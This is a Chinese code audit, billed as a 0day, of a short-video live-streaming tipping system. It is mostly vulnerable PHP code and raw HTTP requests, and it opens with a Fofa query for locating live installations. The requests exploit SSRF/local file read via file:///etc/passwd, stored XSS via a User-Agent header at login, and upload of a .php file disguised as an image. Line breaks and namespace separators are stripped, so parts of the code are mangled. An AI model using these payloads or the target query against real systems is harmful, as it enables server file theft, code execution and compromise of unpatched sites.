(0day)某短视频直播打赏系统代码审计

Fofa:"Location: https://m.baidu.com" && domain!="baidu.com" 

public function get_curl($url,$post=0,$referer=0,$cookie=0,$header=0,$ua=0,$nobaody=0,$ip=0,$split=0){  $ch = curl_init();  curl_setopt($ch, CURLOPT_URL,$url);  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);  $httpheader[] = "Accept:*/*";  $httpheader[] = "Accept-Encoding:gzip,deflate,sdch";  $httpheader[] = "Accept-Language:zh-CN,zh;q=0.8";  $httpheader[] = "Connection:close";  curl_setopt($ch, CURLOPT_HTTPHEADER, $httpheader);  curl_setopt($ch, CURLOPT_TIMEOUT, 30);  if($post){    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);  }  if($header){    curl_setopt($ch, CURLOPT_HEADER, TRUE);  }  if($cookie){    curl_setopt($ch, CURLOPT_COOKIE, $cookie);  }  if($referer){    if($referer==1){      curl_setopt($ch, CURLOPT_REFERER, 'http://m.qzone.com/infocenter?g_f=');    }else{      curl_setopt($ch, CURLOPT_REFERER, $referer);    }  }  if($ip){    curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR:'.$ip, 'CLIENT-IP:'.$ip));  }  if($ua){    curl_setopt($ch, CURLOPT_USERAGENT,$ua);  }else{    curl_setopt($ch, CURLOPT_USERAGENT, 'Stream/1.0.3 (iPhone; iOS 12.4; Scale/2.00)');  }  if($nobaody){    curl_setopt($ch, CURLOPT_NOBODY,1);  }  curl_setopt($ch, CURLOPT_ENCODING, "gzip");  curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  $ret = curl_exec($ch);  if ($split) {    $headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);    $header = substr($ret, 0, $headerSize);    $body = substr($ret, $headerSize);    $ret=array();    $ret['header']=$header;    $ret['body']=$body;  }   curl_close($ch);  return $ret; }

GET /caiji/get_curl?url=file:///etc/passwd HTTP/1.1Host: 127.0.0.1Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

/*** 用户登录* @return string* @throws Exception*/public function index(){    $captcha = Env::get('easyadmin.captcha', 1);    if ($this->request->isPost()) {      $post = $this->request->post();      if(isset($post['ypm']))      {        return $this->reg();      }      $rule = [        'username|用户名'      => 'require',        'password|密码'       => 'require',        'keep_login|是否保持登录' => 'require',        ];      $captcha == 1 && $rule['captcha|验证码'] = 'require|captcha';      $this->validate($post, $rule);      $admin = SystemAdmin::where(['username' => $post['username']])->find();      if (empty($admin)) {        $this->error('用户不存在');      }      // var_dump(password("yxymk.net"));die;      if (password($post['password']) != $admin->password) {        $this->error('密码输入有误');      }      if ($admin->status == 0) {        $this->error('账号已被禁用');      }      $admin->login_num += 1;      $admin->save();      $admin = $admin->toArray();      unset($admin['password']);      $admin['expire_time'] = $post['keep_login'] == 1 ? true : time() + 7200;      $admin['expire_time'] = true;      session('admin', $admin);      $this->success('登录成功');    }    $this->assign('captcha', $captcha);    $this->assign('demo', $this->isDemo);    return $this->fetch();  }

<?phpnamespace appadmincontrollersystem;use appadminmodelSystemLog;use appcommoncontrollerAdminController;use EasyAdminannotationControllerAnnotation;use EasyAdminannotationNodeAnotation;use thinkApp;/** * @ControllerAnnotation(title="操作日志管理") * Class Auth * @package appadmincontrollersystem */class Log extends AdminController{    public function __construct(App $app){        parent::__construct($app);        $this->model = new SystemLog();    }    /**     * @NodeAnotation(title="列表")     */    public function index(){        if ($this->request->isAjax()) {            if (input('selectFields')) {                return $this->selectList();            }            [$page, $limit, $where, $excludeFields] = $this->buildTableParames(['month']);            $month = (isset($excludeFields['month']) && !empty($excludeFields['month']))                ? date('Ym',strtotime($excludeFields['month']))                : date('Ym');            // todo TP6框架有一个BUG，非模型名与表名不对应时（name属性自定义），withJoin生成的sql有问题            $count = $this->model                ->setMonth($month)                ->with('admin')                ->where($where)                ->select();            $list = $this->model                ->setMonth($month)                ->with('admin')                ->where($where)                ->page($page, $limit)                ->order($this->sort)                ->select();            $data = [                'code'  => 0,                'msg'   => '',                'count' => $count,                'data'  => $list,            ];            return json($data);        }        return $this->fetch();    }}

POST /admin/login/index.html HTTP/1.1Host: 127.0.0.1:81Content-Length: 47sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: 1234<script>alert(666)</script>sec-ch-ua-platform: "Windows"Origin: http://127.0.0.1:81Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1:81/admin/login/index.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeusername=admin1&password=123123123&keep_login=0

/*** 上传文件*/public function upload(){    $data = [      'upload_type' => $this->request->post('upload_type'),      'file'        => $this->request->file('file'),      ];    $uploadConfig = sysconfig('upload');    empty($data['upload_type']) && $data['upload_type'] = $uploadConfig['upload_type'];    $rule = [      'upload_type|指定上传类型有误' => "in:{$uploadConfig['upload_allow_type']}",      'file|文件'              => "require|file|fileExt:{$uploadConfig['upload_allow_ext']}|fileSize:{$uploadConfig['upload_allow_size']}",      ];    $this->validate($data, $rule);    try {      $upload = Uploadfile::instance()        ->setUploadType($data['upload_type'])        ->setUploadConfig($uploadConfig)        ->setFile($data['file'])        ->save();    } catch (Exception $e) {      $this->error($e->getMessage());    }    if ($upload['save'] == true) {      $this->success($upload['msg'], ['url' => $upload['url']]);    } else {      $this->error($upload['msg']);    }  }

POST /admin/ajax/upload HTTP/1.1Host: 127.0.0.1:81Content-Length: 290sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqVHCE6rweLU4xoLdX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://127.0.0.1:81Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1:81/admin/stock/add?d=dspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: userid=1; PHPSESSID=300471c6cebde33867306a662af88460Connection: close------WebKitFormBoundaryqVHCE6rweLU4xoLdContent-Disposition: form-data; name="type"php------WebKitFormBoundaryqVHCE6rweLU4xoLdContent-Disposition: form-data; name="file"; filename="2.php"Content-Type: image/png<?php phpinfo();?>------WebKitFormBoundaryqVHCE6rweLU4xoLd--